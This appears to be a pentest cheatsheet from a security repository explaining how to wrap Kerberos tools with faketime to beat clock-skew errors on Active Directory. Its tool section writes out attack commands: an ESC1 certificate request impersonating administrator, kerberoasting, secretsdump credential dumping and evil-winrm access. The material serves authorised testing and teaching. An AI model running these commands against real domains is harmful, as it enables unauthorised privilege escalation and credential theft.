daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

faketime.md (8516B)


      1 ---
      2 title: "faketime"
      3 description: "sudo apt install faketime # ships as libfaketime"
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: ["active-directory", "kerberos"]
      7 tools: ["Nmap", "NetExec", "Impacket", "Certipy", "BloodHound"]
      8 difficulty: intermediate
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/faketime-cheatsheet.md"
     11 ---
     12 # Faketime Cheat Sheet — Beating Kerberos Clock Skew
     13 
     14 > [!info] The problem
     15 > Kerberos rejects requests whose timestamp differs from the DC by more than the allowed skew window (default **5 minutes**). You see:
     16 > ```
     17 > Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
     18 > ```
     19 > Rather than change your host clock (which breaks other things), wrap the *one* tool that needs it with `faketime`.
     20 
     21 ```bash
     22 sudo apt install faketime      # ships as libfaketime
     23 ```
     24 
     25 `faketime` intercepts time calls (`gettimeofday`, `clock_gettime`) via `LD_PRELOAD` for the wrapped process only. Your system clock stays untouched.
     26 
     27 ---
     28 
     29 ## Table of Contents
     30 
     31 1. [Measuring the Skew](#1-measuring-the-skew)
     32 2. [Faketime Offset Syntax](#2-faketime-offset-syntax)
     33 3. [The 7h30m Worked Example](#3-the-7h30m-worked-example)
     34 4. [Wrapping the Tools](#4-wrapping-the-tools)
     35 5. [Absolute-Time Method (ntpdate)](#5-absolute-time-method-ntpdate)
     36 6. [Questions & Answers](#6-questions--answers)
     37 7. [Gotchas](#7-gotchas)
     38 
     39 ---
     40 
     41 ## 1. Measuring the Skew
     42 
     43 <figure class="flow plate corners">
     44   <figcaption class="flow__cap"><span class="flow__kind">Clock-skew check</span><span class="flow__dir">LR</span></figcaption>
     45   <div class="flow__body">
     46     <div class="flow__diagram" data-dir="lr">
     47       <div class="flow-rank"><div class="flow-node is-entry">nmap clock-skew<span class="sub">or ntpdate -q</span></div></div>
     48       <div class="flow-edge"></div>
     49       <div class="flow-rank"><div class="flow-node is-decision">Skew &gt; 5 min?</div></div>
     50       <div class="flow-branches">
     51         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">No</span></div><div class="flow-node">Run tool normally</div></div>
     52         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Yes</span></div><div class="flow-node">faketime wrapper</div><div class="flow-edge"></div><div class="flow-node is-goal">Kerberos auth succeeds</div></div>
     53       </div>
     54     </div>
     55   </div>
     56 </figure>
     57 
     58 **nmap** reports skew directly on many AD services:
     59 
     60 ```bash
     61 nmap -p 445,88 --script smb2-time,clock-skew -Pn dc01.corp.local
     62 # ... | clock-skew: mean: 7h30m00s, deviation: 0s, median: 7h30m00s
     63 ```
     64 
     65 Or query the DC's time straight (needs `ntpdate` / `ntpsec-ntpdate`):
     66 
     67 ```bash
     68 ntpdate -q dc01.corp.local          # prints offset in seconds, e.g. "offset 27000.0..."
     69 sudo ntpdate -u dc01.corp.local     # actually sync (alternative to faketime)
     70 rdate -n dc01.corp.local            # another quick reader
     71 ```
     72 
     73 > [!tip] Sign matters
     74 > nmap's clock-skew is **DC minus you**. `7h30m` positive = the DC is *ahead* of you, so you must push your faked clock **forward** (`+7h30m`). If the DC is *behind*, go backward (`-7h30m`).
     75 
     76 ---
     77 
     78 ## 2. Faketime Offset Syntax
     79 
     80 `faketime` takes a timestamp specifier as its first argument, then the command:
     81 
     82 ```bash
     83 faketime '<time-spec>' <command> [args...]
     84 ```
     85 
     86 Relative offsets use a leading `+` or `-` and unit suffixes:
     87 
     88 | Unit | Meaning |
     89 | :-- | :-- |
     90 | `s` | seconds |
     91 | `m` | minutes |
     92 | `h` | hours |
     93 | `d` | days |
     94 | `y` | years |
     95 
     96 ```bash
     97 faketime '+7h30m'  <cmd>      # 7 hours 30 minutes into the future
     98 faketime '-7h30m'  <cmd>      # 7 hours 30 minutes into the past
     99 faketime '+27000s' <cmd>      # same as +7h30m, in raw seconds
    100 faketime '-1h'     <cmd>      # one hour back
    101 ```
    102 
    103 > [!note] `-f` for programs that fork/exec
    104 > Many pentest tools spawn children or advance their own clock. Add `-f` (follow) so the faked time propagates to child processes:
    105 > ```bash
    106 > faketime -f '+7h30m' certipy-ad find ...
    107 > ```
    108 > Use `-f` by default when wrapping Python/impacket tooling.
    109 
    110 ---
    111 
    112 ## 3. The 7h30m Worked Example
    113 
    114 Scenario: `nmap` shows `clock-skew: median: 7h30m00s` and the DC is **ahead**.
    115 
    116 ```bash
    117 # 1. Confirm direction and magnitude
    118 nmap -p 445 --script smb2-time,clock-skew -Pn 10.10.10.5
    119 
    120 # 2. Everything Kerberos-related now gets the wrapper:
    121 faketime -f '+7h30m' <your-kerberos-tool>
    122 
    123 # If the DC were 7h30m BEHIND you instead:
    124 faketime -f '-7h30m' <your-kerberos-tool>
    125 ```
    126 
    127 That single prefix is all that changes — the tool itself is invoked exactly as normal after it.
    128 
    129 ---
    130 
    131 ## 4. Wrapping the Tools
    132 
    133 > [!warning] Wrap the process that talks Kerberos
    134 > Prefix `faketime -f '<offset>'` directly onto the command. Do **not** pipe or subshell it away.
    135 
    136 ### Certipy (AD CS / ESC attacks)
    137 
    138 ```bash
    139 # Enumerate templates over Kerberos with skew correction
    140 faketime -f '+7h30m' certipy-ad find -u 'user@corp.local' -p 'Passw0rd!' \
    141   -dc-ip 10.10.10.5 -k -no-pass -vulnerable -stdout
    142 
    143 # Request a cert (ESC1) with a fake time
    144 faketime -f '+7h30m' certipy-ad req -u 'user@corp.local' -p 'Passw0rd!' \
    145   -ca 'CORP-CA' -template 'VulnTemplate' -upn 'administrator@corp.local' \
    146   -dc-ip 10.10.10.5
    147 
    148 # Authenticate with the resulting PFX (PKINIT) — also needs correct time
    149 faketime -f '+7h30m' certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.10.5
    150 ```
    151 
    152 ### bloodhound-ce-python (collection over Kerberos)
    153 
    154 ```bash
    155 # Collect using a Kerberos ticket (ccache) with skew correction
    156 faketime -f '+7h30m' bloodhound-ce-python -d corp.local -u user -k -no-pass \
    157   -dc dc01.corp.local -ns 10.10.10.5 -c All --zip
    158 ```
    159 
    160 See bloodhound-ce-python-cheatsheet for the full flag set.
    161 
    162 ### Impacket (secretsdump, GetUserSPNs, psexec, wmiexec)
    163 
    164 ```bash
    165 export KRB5CCNAME=user.ccache
    166 faketime -f '+7h30m' impacket-GetUserSPNs -k -no-pass -dc-host dc01.corp.local corp.local/user
    167 faketime -f '+7h30m' impacket-secretsdump -k -no-pass corp.local/user@dc01.corp.local
    168 faketime -f '+7h30m' impacket-getTGT corp.local/user:'Passw0rd!' -dc-ip 10.10.10.5
    169 ```
    170 
    171 ### netexec / evil-winrm
    172 
    173 ```bash
    174 faketime -f '+7h30m' netexec smb dc01.corp.local -u user -p 'Passw0rd!' -k
    175 faketime -f '+7h30m' evil-winrm -i dc01.corp.local -u administrator -r corp.local
    176 ```
    177 
    178 ---
    179 
    180 ## 5. Absolute-Time Method (ntpdate)
    181 
    182 Instead of computing an offset, pin faketime to the DC's *actual* clock. This auto-corrects magnitude **and** direction:
    183 
    184 ```bash
    185 # Grab the DC's current time and hand it straight to faketime
    186 faketime -f "$(sudo ntpdate -q dc01.corp.local | head -n1 | awk '{print $1, $2}')" \
    187   certipy-ad find -u 'user@corp.local' -p 'Passw0rd!' -dc-ip 10.10.10.5 -k
    188 ```
    189 
    190 > [!tip] When to use which
    191 > **Relative (`+7h30m`)** is fastest when nmap already gave you the skew. **Absolute (ntpdate)** is safer when you're unsure of the direction or the skew is odd (leap seconds, wrong timezone on your box).
    192 
    193 ---
    194 
    195 ## 6. Questions & Answers
    196 
    197 ### Q: nmap says `clock-skew: median: 7h30m00s`. What faketime prefix do I use?
    198 **Approach:** nmap reports DC-minus-you; a positive value means the DC is ahead.
    199 ```bash
    200 faketime -f '+7h30m' <tool>
    201 ```
    202 **Answer:** `+7h30m` (if the DC is ahead). Use `-7h30m` if it's behind.
    203 
    204 ### Q: I keep getting `KRB_AP_ERR_SKEW` even with faketime. Why?
    205 **Answer:** Likely missing `-f`, wrong sign, or your host timezone is off. Confirm with `sudo ntpdate -q <dc>` and prefer the absolute-time method (§5).
    206 
    207 ### Q: Does faketime change my real system clock?
    208 **Answer:** No. It only alters what the wrapped process sees via `LD_PRELOAD`. Everything else stays on real time.
    209 
    210 ### Q: Can I just run `ntpdate` to sync instead?
    211 **Answer:** Yes — `sudo ntpdate -u dc01.corp.local` syncs your whole host. It's simpler but affects every process and needs root; faketime is surgical and rootless.
    212 
    213 ---
    214 
    215 ## 7. Gotchas
    216 
    217 > [!warning] Common pitfalls
    218 > - **Forgot `-f`** — child/fork'd processes (most Python tools) don't inherit the fake clock without it.
    219 > - **Wrong sign** — pushing the clock the wrong way doubles the skew instead of cancelling it.
    220 > - **Timezone drift** — if your host TZ is wrong, the seconds offset can look bizarre; use absolute time.
    221 > - **Statically linked binaries** — faketime relies on `LD_PRELOAD`, so it can't hook fully static binaries (rare for pentest tooling).
    222 > - **Wrapping a shell, not the tool** — `faketime -f '+7h30m' bash -c '...'` works, but prefix the actual tool where possible.
    223 
    224 ---
    225 
    226 ## See Also
    227 
    228 - bloodhound-ce-python-cheatsheet — CE collector, all with faketime notes
    229 - BloodHound-Python_Cheatsheet — legacy BloodHound python collector
    230 - Kerberos — tickets, roasting, PKINIT